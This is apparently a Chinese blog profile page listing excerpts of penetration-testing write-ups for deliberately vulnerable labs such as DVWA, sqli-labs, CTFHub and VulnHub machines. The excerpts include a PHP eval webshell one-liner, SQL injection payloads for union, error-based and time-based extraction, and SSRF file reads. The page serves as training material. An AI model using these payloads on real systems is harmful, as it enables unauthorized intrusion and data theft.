自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(74)
  • 资源 (1)
  • 收藏
  • 关注

原创 靶机渗透(五)——metasploitable2

目录一、简介二、信息收集三、端口渗透6667-irc21弱口令一、简介metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。靶机下载地址用户名是 :msfadmin 密码是: msfadmin二、信息收集nmap -sS 192.168.92.0/24开放了好多端口三、端口渗透启动msf msfconsole6667-irc登录msf search irc 找到对应得

2022-04-29 22:00:00 7314 2

原创 靶机渗透——Lin.Security

目录靶机描述环境配置一、信息收集二、sudo提权三、crontab定时任务四、敏感隐藏文件五、suid提权六、NFS服务低权限访问靶机描述在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。首先,您可以使用以下凭据登录主机:bob / secret下载地址:https://in.security/do

2022-04-28 14:57:37 923

原创 DVWA-File Upload

目录简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible简介概念FileUpload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限;这里上传的文件可以是木马,病毒,恶意脚本等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果;文件上传漏洞的前提条件能上传木

2022-04-25 16:52:12 398

原创 DVWA-SQL Injection

目录简介sql注入漏洞原理SQL注入漏洞类型危害安全级别:Low查看源码源码分析数据库名表名列名字段值安全级别:Medium查看源码源码分析数据库名表名列名字段值安全级别:High查看源码源码分析闭合符号为`’`判断列数数据库名表名列名数据安全级别:Impossible查看源码源码分析防护总结简介sql注入漏洞原理将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的;SQL注入漏洞类型字符型;数字型;搜索型;危害攻击者未经授权可以访问数据库中的数据,盗取用户的隐私

2022-04-25 16:51:56 229

原创 DVWA-SQL Injection (Blind)

目录简介sql盲注SQL盲注的类型安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible简介sql盲注SQL Injection(Blind),即SQL盲注;注入:可以查看到详细内容;盲注:目标只会回复是或不是,没有详细内容;SQL盲注的类型基于布尔值的盲注;基于时间的盲注;基于报错的盲注;安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible...

2022-04-25 16:51:01 865

原创 DVWA-XSS (Stored)

目录简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible简介存储型XSS长期存储于服务器端;每次用户访问都会执行脚本代码;安全级别:Low查看源码<?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );

2022-04-25 16:50:20 3170

原创 DVWA-XSS (Reflected)

目录简介安全级别:Low安全级别:Medium安全级别:Impossible防护总结简介XSS(cross-site scripting)跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击;XSS可以盗取客户端cookie,将客户端重定向到第三方网站;客户端脚本语言弹窗警告、广告;JavaScript;在浏览器中执行;XSS漏洞类型存储型XSS;(持久型) 恶意代码被保存到目标网站的服务器中,每次用户访问时都会执

2022-04-25 16:49:58 361

原创 DVWA-File Inclusion(文件包含)

目录简介安全级别:Low本地文件包含远程文件包含安全级别:Medium安全级别:High安全级别:Impossible防护总结:参考简介1.文件包含开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含;2. 文件包含漏洞开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞;3.php中引发文件包含漏洞的通常是以下四个函数inc

2022-04-25 16:49:35 356

原创 DVWA-CSRF(跨站请求伪造)

目录CSRF(跨站请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:ImpossibleCSRF(跨站请求伪造)简介概念CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。CSRF与XSS的区别CSRF属于业务逻辑漏洞

2022-04-25 16:49:15 2638 1

原创 DVWA-Command Injection

Command Injection简介概念命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;就好比说一句话木马<?php @eval($_POST['cmd']);?>类型代码过滤不严或无过滤;系统漏洞造成的命令执行,bash破壳漏洞,该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到bash交互的多种应用,例如:http,ssh,dhcp;调用第三方组件,例如:php(syst

2022-04-25 16:46:52 253

原创 DVWA-Brute Force

配置环境将下载的DVWA放在www目录下,然后复制一份/config/config.inc.php.dist到当前目录,并且去掉.dist。在phpMyadmin如果没有表dvwa,则新建一个表dvwadb_user,db_password是数据库的账号和密码之后找到DVWA的路径,找到下面的create/reset database点击(再次进入phpMyadmin查看表dvwa,表中已经有数据,密码用md5加密),等2秒自动跳转登录页面输入账号admin,密码password如果有乱

2022-04-21 13:29:59 3124

原创 靶机渗透(三)——Lazysysadmin

环境配置都是在vmware中靶机:未知,nat模式kali:192.168.92.5 nat,模式信息收集arp-scan -l扫描局域网内所有的ip从上图可知,靶机的ip是192.168.92.6端口扫描nmap -sS -Pn -T4 -sV -O 192.168.92.6或者masscan 192.168.92.6 -p 0-65535 --rate=10000masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫namp:-T4(分为0-5等级;-s

2022-04-21 00:57:27 3435

原创 靶机渗透(二)——Billu_b0x

一、环境配置kali:192.168.92.5 nat模式靶机:192.168.92.3 nat模式二、信息收集1.扫描ipnmap -sP 192.168.92.0/242.端口扫描半开扫描:nmap -sS 192.168.92.3全开扫描:nmap -sT 192.168.92.33个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。3.目录扫描dirb http://192.168.92.3

2022-04-18 09:54:03 2089 3

原创 靶机渗透(一)——bulldog2

一、靶机下载靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova二、bulldog2靶机搭建将刚刚下载完成的bulldog2.ova导入到VM VirtualBox,并且修改靶机的网络,注意红框,下面能用到修改完打开就是这样的三、kali攻击机打开vmware中的虚拟网络编辑器,将kali网络类型配置成桥接模式,桥接至(不要自动,找到靶机的页面名称)四、攻击1.在kali上查看ipifconfig发现ip地址为192.1

2022-04-16 17:26:13 2389

原创 CTFHub-SSRF(未完)

内网访问本题很简单,用bs抓包,然后在url中添加127.0.0.1/flag.php伪协议读取文件提示:尝试去读取一下Web目录下的flag.php吧一般遇到SSRF时,先测试所有的url协议file:///dict://sftp://ldap://tftp://gopher://网站的根目录一般在var/www/htmlfile:///var/www/html/flag.php端口扫描参考博客提示:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦

2022-04-15 15:38:34 163

原创 xss-labs-test1-test20

简述跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、 LiveScript、ActiveX、 Flash 或者甚

2022-04-15 13:34:07 1428

原创 Redis-b站狂神笔记

Nosql概述1.单机Msql时代[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WaX8fExn-1649590198698)(C:\Users\hp\AppData\Roaming\Typora\typora-user-images\image-20220317100157112.png)]90年代,网站访问量一般不太大,单个数据库足够用,更多的是静态网页html,服务器没有太大的压力瓶颈:数据量如果太大,一个机器放不下数据的索引(mysql使用B+Tr

2022-04-13 14:50:05 733

原创 CTFHub-RCE

RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。eval执行我们直接在输入栏上输入类似cmd的命令行,直接操作web服务器执行我们所写的命令内容查看当前目录文件

2022-04-09 21:16:05 388

原创 CTFHub-文件上传

无验证上传一个一句话木马<?php @eval($_POST['upload']);?>然后用蚁剑连接在上级目录就可以看到flag的php文件前端验证这个可以用burp suit抓包,分析一下,发现只允许jpg,png,gif格式上传,我们将php文件后缀改成jpg提交,然后抓包再改回来,用蚁剑连接成功.htaccess验证htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、

2022-04-08 15:57:26 1005

原创 ctfhub-sql注入

整数型注入行数1 order by 2数据库名-1 union select 1,database() --一开始我在后面加上+,但是这个+是在url才可以被当作空格,有点傻了表名-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' --字段-1 union select 1,group_concat(column_name) fro

2022-04-07 20:09:27 1880

原创 burp suit中intruder的使用

burp suit中intruder的简单介绍,快速入手

2022-04-07 16:08:10 176

原创 文件上传(第1-19关)

lastIndexOf() 方法可返回一个指定的字符串值最后出现的位置,在一个字符串中的指定位置从后向前搜索。 stringObject.lastIndexOf(searchvalue,fromindex) searchvalue 必需。规定需检索的字符串值。 fromindex 可选的整数参数。规定在字符串中开始检索的位置。它的合法取值是 0 到 stringObject.length - 1。如省略该参数,则将从字符串的最后一个字符处开始检索。注释:lastIndexOf() 方法对大小写敏

2022-04-02 20:54:24 1778

原创 sql注入21-27关

21关经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密解密后base64编解码地址:https://tool.oschina.net/encrypt?type=3可以推出,我们需要在burp suite上将编码后的内容输入') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回

2022-04-01 10:02:48 3103

原创 sql注入16-20

16-20关的解释,新手的那些疑问

2022-03-31 16:18:36 1803

原创 sql注入第15关

闭合符号465 'or 1=1#查看数据库名-1 'or if(length(database())=8,sleep(2),1)#-1' or if((ascii(substr((database()),1,1)))=115,sleep(2),1)#查看表名-1' or if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1

2022-03-15 12:52:34 700

原创 sql注入第十四关------延时注入和布尔盲注

闭合符号465" or 1=1#列数465" order by 2#465" order by 3#所以确定有两列,但是没有回显,尝试延时注入数据库名" or if(length(database())>8,sleep(2),1)#" or if(length(database())>7,sleep(2),1)#不知道为什么这个时间远远大于2秒,但是可以判断出数据库名的字符串长度为8,接下来就和第九关和第十关类似了,判断每个字符的ascii码,然后再asci

2022-03-15 10:21:30 3263

原创 sql注入第13关------报错注入和联合注入

闭合符') or 1=1 #结果没有回显,可以考虑延时注入,布尔盲注和报错注入但是延时注入对于错误和正确没有时间区别,所以不能用报错注入有回显,所以布尔盲注就不用了admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#既然已经确定是报错注入和联合注入了,那么和前面的差不多了。...

2022-03-14 21:08:05 558

原创 sql注入第12关------布尔类型

本关和第11关相比,只是闭合符不同") or 1=1 #参考第11关

2022-03-14 18:21:11 144

原创 sql注入第11关

这关采用post的方式传参定闭合符使用’ or 1=1 # 回显正常使用" or 1=1 #,回显报错(可以尝试更多的闭合符,这里就不一一实现了)实现原理查询列数’ order by 2 #’ order by 3 #所以有两列找显示位查数据库名'union select 1,database()#查表名' union select 1,group_concat(table_name) from information_schema.tables where tab

2022-03-14 17:55:26 4066

原创 sql注入第十关------延时注入

第十关和第九关一样都使用了延时注入127.0.0.1/sqli-labs-master/Less-10/?id=1" and (sleep(2))--+但是闭合符号变成了双引号具体操作详见第九关https://blog.csdn.net/qq_45751902/article/details/123471177?spm=1001.2014.3001.5501...

2022-03-14 11:01:45 396

原创 sql注入第九关------延时注入

这关无论输入什么闭合符号回显都是正确的,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。先引入几个函数1.if(Condition,A,B)函数2.当Condition为TRUE时,返回A;当Condition为FALSE时,返回B。3.sleep()函数 网页延迟n秒后,输出结果4.left()函数 左边数,取几个数5.substr(var1, var2, var3) 功能:从字符串里截取其中一段字符(串) - va

2022-03-14 10:39:31 4501

原创 Scrapy详解

Scrapy详解#我认为每一个博客都没有Scrapy原文档解释的清楚,所以下面有地址,祝君“食”用愉快https://scrapy-chs.readthedocs.io/zh_CN/1.0/intro/overview.html

2021-11-12 11:06:56 364

原创 配置k8s遇到unable to connect to the server:dial tcp 192.168.*.*:5443:connect:no route to host

**配置k8s遇到unable to connect to the server:dial tcp 192.168..:5443:connect:no route to host**问题描述解决后解决方法查看192.168.0.106是不是你集群的ip,如果不是,找到一个匹配的文件(红圈内的),然后重做此步,就解决了。...

2021-10-13 21:56:45 6288

原创 linux配置ftp服务

#在Linux中配置FTP服务##一、FTP连接及传输控制连接:TCP 21,用于发送FTP命令信息数据连接:TCP 20,用于上传、下载数据数据连接的建立类型:主动模式:服务端从20端口主动向客户端发起连接被动模式:服务端在指定范围内某个端口被动等待客户端连接FTP用户的类型:匿名用户:anonymous或ftp本地用户:账号密码等信息保存在passwd、shadow文件中虚拟用户->本地用户linux下的FTP软件包:vsftpd官方站点:http://vsftpd.bea

2021-04-07 17:14:10 2358

文字识别tesseract-ocr-w64

tesseract-ocr-w64-setup-v5.0.1.20220118.exe

2022-03-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除